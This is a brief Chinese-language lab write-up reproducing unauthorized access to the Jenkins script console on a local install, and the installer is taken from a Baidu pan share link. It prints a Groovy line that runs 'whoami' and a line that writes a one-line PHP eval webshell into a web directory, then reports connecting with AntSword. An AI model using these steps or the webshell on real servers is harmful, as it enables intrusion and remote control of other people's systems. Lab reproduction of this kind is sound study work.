0x01 前言
跟着百度一步步做,也算是认识了
?
0x02 jenkins是什么?
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
ps:不搞java开发,了解即可。
0x03 漏洞概述
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
默认端口为8080
0x04 漏洞复现
安装jenkins
链接:https://pan.baidu.com/s/1PzUlSp7Cw82x6zVsvpI6FA
提取码:9528
下载成功,运行后任务管理器开启jenkins服务。
?
然后再浏览器输入http://localhost:8080
?
找到脚本命令行,输入
println "whoami".execute().text
上传webshell
new File("D:\\phpstudy_pro\\WWW\\ma.php").write('<?php @eval($_POST[cmd]);?>');
蚁剑连接,成功
